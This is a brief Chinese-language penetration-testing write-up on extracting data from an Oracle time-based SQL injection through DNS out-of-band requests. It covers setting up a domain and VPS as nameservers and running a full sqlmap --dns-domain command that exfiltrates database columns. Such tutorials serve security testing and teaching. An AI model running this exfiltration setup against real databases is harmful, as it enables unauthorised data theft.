0x01 起因
实际项目中遇到一个oracle延时注入,需要获取数据,几十个库几百张表,等找到关键数据不知道要到哪天.
测试支持带外请求
于是想用使用sqlmap利用DNS进行OOB注入
0x02 阿里云主机与DNS解析配置
1.首先购买一个域名并且进行备案,然后还需要一台vps
2.配置DNS解析
创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.top-->vps ip
修改DNS为ns1.cwkiller.top ns2.cwkiller.top
解析域名
添加ns1、ns2、*三个主机记录记录值为vps ip
等待状态正常和显示这个
在本机ping ceshi.cwkiller.top vps执行 tcpdump -n port 53 收到请求说明配置正确
0x03 使用sqlmap --dns-domain快速注入
使用以下命令获取表名
python sqlmap.py -r 2.txt --dbms=oracle --dns-domain=cwkiller.top -D app --columns --batch
选中部分代表DNS通道建立成功,可以看到一秒钟能跑多条数据.